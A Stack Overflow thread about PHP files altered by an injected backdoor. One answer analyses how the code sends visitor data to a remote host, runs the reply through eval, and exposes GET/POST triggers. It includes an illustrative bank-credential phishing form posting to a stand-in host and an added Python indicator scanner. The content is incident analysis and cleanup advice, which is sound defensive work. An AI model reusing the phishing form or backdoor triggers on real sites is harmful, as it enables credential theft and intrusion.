hackers have added content to my PHP files [closed]

Tags:

security

php

My website has been taken down by hackers, and looking through the site there is a load of additional stuff at the top of each PHP file.

Each file now starts with:

GLOBAL $wehaveitagain;
if($wehaveitagain != 1)
{

Full addition here

The database seems to be fine, so I am curious, what is the likely path of entry to be able to edit my files?

Mild Fuzz asked Sep 13 '11 13:09


2 Answers

You're not the first to get hit by airschk

The exploit is based around a POST request with a variable prgetxr being set.

If it isn't set (and likely, in normal use of the site, it won't be) it cycles through that IP hash-map mynetsxx and if it finds that the requesting IP is in the network that matches this (to understand "network" you have to understand how networking works, but these are basically local guys, not remote), and if it is, it calls rewrioutclbkxxx. You can manually request that function call by sending a GET request where a GET variable showmeallpls is true.

rewrioutclbkxxx is passed through output-buffer start, so it's likely going to screw with all the data BEFORE it's sent, but AFTER your normal code is done doing its thing.

BEWARE, LIKELY A MALICIOUS DOMAIN BELOW DON'T GO UNLESS YOU KNOW WHAT YOU'RE DOING.

It's going to pull data from hxxp://airschk.com/clk (I've censored the HTTP in that URL), it wants to get a bunch of data, so it sends a string that contains: user-agent (ie, the user's browser), their IP address, what URL they've requested, what page they came from, and the ID code 4dae82ac67843a194c000ca1 which is likely something they've set up to identify your server.

So in short, the code sends a whole whack of user information off to airschk, and it returns some data. That data gets tossed into an EVAL. Boom, your site is pwn'd.

EVAL will evaluate any string in there as if it's php. They can delete everything, edit everything, change anything they want, perhaps even get shell access. You're basically pwnt.

Now wait, what if we did send that POST request way back there? Oh sneaky, they've gone to a URL at toolbarqueries.google.com, but the URL tries to jack up google page rank for the URL (Blackhat SEO, you can get banned from google for this, but in the short-term they get more hits).

So to recap, how this attack works

  1. A bunch of your user data is being sent to the criminals at airschk.
  2. They're sending back whatever the hell they want, and it has nearly unlimited power to screw you (and it's customized to each user if they want)
  3. They try to boost your google rank in ways that get you perma-banned from google.
  4. Back doors to check are POST requests of prgetxr and GET requests of showmeallpls.

Example of what they might do

Since they can edit the output stream of your files on-demand and know the user-agent as well as IP address they probably can track your users. Let's say you're a bank, and this is your login HTML:

<form method="post" action="./login.php">
    <input name="BankAccountNumber" />
    <input name="Password" />
</form>

Okay, the output-buffer rewrite can actually keep everything exactly the way it is and do this to your users:

<p>We have noticed high activity on your account, please provide additional information to help secure your account.</p>
<form method="post" action="http://example.com/hax/lulz">
    <input name="CreditCardNumber" />
    <input name="SocialSecurityNumber" />
    <input name="FullName" />
    <input name="DateOfBirth" />
    <input name="HomeAddress" />

    <input name="BankAccountNumber" />
    <input name="Password" />
    <input name="prgetxr" />
</form>

How to prevent this.

Well, I'd say your whole server is never to be trusted again. Nuke the damn thing from orbit and re-install a backup.

Don't have a backup? What's wrong with you? Put a backup in place after you've hired someone to comb through every line of code, every database record, and every last file installed on your system because more exploits could be anywhere. Nuke the damn thing and install a backup.

Next, set chmod settings so these files cannot be edited by anyone other than an account that is NOT the web-account. You need to understand unix security.

Next, remove that damn eval from any file that runs on your server (maybe even configure suhosin). If you have any running code that depends on it, you're doing it wrong anyway. Remove it. You need to.

A band-aid measure will be to block the hacker domain, but this is totally worthless past 12 hours, they can just move elsewhere, and likely have by now.

I can't tell about the path of attack they took to do this, so that's a whole different investigation and not really a question for SO.

Lastly, hire someone who's a trained security expert.

Security isn't trivial or easy or quick to learn. Don't play games, pay someone who knows what they're doing.

Incognito answered Sep 28 '22 02:09
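As an added example (not code from the question or either answer): a Python scanner that looks, across a document root, for the indicators the answer above names (the $wehaveitagain header, the prgetxr / showmeallpls variables, the mynetsxx and rewrioutclbkxxx names, the airschk domain, and the ob_start-plus-eval pattern) and that pulls the showmeallpls GET trigger out of access-log lines. The file tree and log lines are constructed samples, and the indicator list is only what this answer mentions, so treat it as a starting point rather than a complete signature.

```python
import os
import re
import tempfile
# Indicators quoted in the answer; a starting point, not a complete signature set.
FILE_MARKERS = ("$wehaveitagain", "prgetxr", "showmeallpls", "rewrioutclbkxxx", "mynetsxx", "airschk")
# Common-log-format request field, e.g. "GET /index.php?showmeallpls=1 HTTP/1.1"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# Constructed access-log lines: one ordinary request, one hitting the GET trigger.
SAMPLE_LOG = (
    '203.0.113.5 - - [13/Sep/2011:13:09:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [13/Sep/2011:13:10:00 +0000] "GET /index.php?showmeallpls=1 HTTP/1.1" 200 512',
)

def scan_php_file(path):
    """Return the indicators found in one PHP file (empty list when clean)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    hits = [m for m in FILE_MARKERS if m in src]
    # An output-buffer callback plus eval() is the combination the answer describes.
    if re.search(r"\bob_start\s*\(", src) and re.search(r"\beval\s*\(", src):
        hits.append("ob_start+eval")
    return hits

def scan_webroot(root):
    """Walk a document root; map each suspicious file (relative path) to its indicators."""
    findings = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".php", ".inc", ".phtml")):
                full = os.path.join(dirpath, name)
                hits = scan_php_file(full)
                if hits:
                    findings[os.path.relpath(full, root)] = hits
    return findings

def backdoor_triggers(log_lines):
    """Access-log lines carrying the showmeallpls GET trigger. The POST variable
    prgetxr lives in the request body, which a standard access log does not record."""
    return [line for line in log_lines
            if (m := REQ_RE.search(line)) and "showmeallpls" in m.group("path")]

def build_sample_webroot():
    """Constructed sample tree: one clean file, one carrying the injected header."""
    root = tempfile.mkdtemp()
    files = {"clean.php": "<?php echo 'hello'; ?>\n",
             "index.php": "<?php GLOBAL $wehaveitagain; if($wehaveitagain != 1) { ob_start('rewrioutclbkxxx'); eval($x); } ?>\n"}
    for name, body in files.items():
        with open(os.path.join(root, name), "w") as fh:
            fh.write(body)
    return root
```

Run it against a copy of the compromised document root and the web server's access log; a hit on any file is a reason to compare that file against a known-good backup, not to clean it in place.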


I do not know but the best way to find out is to see what ports are open on your machine. The web site that I use frequently to test firewalls etc is http://www.auditmypc.com/firewall-test.asp as it gives you a perspective from the outside world.

Ed Heal answered Sep 28 '22 01:09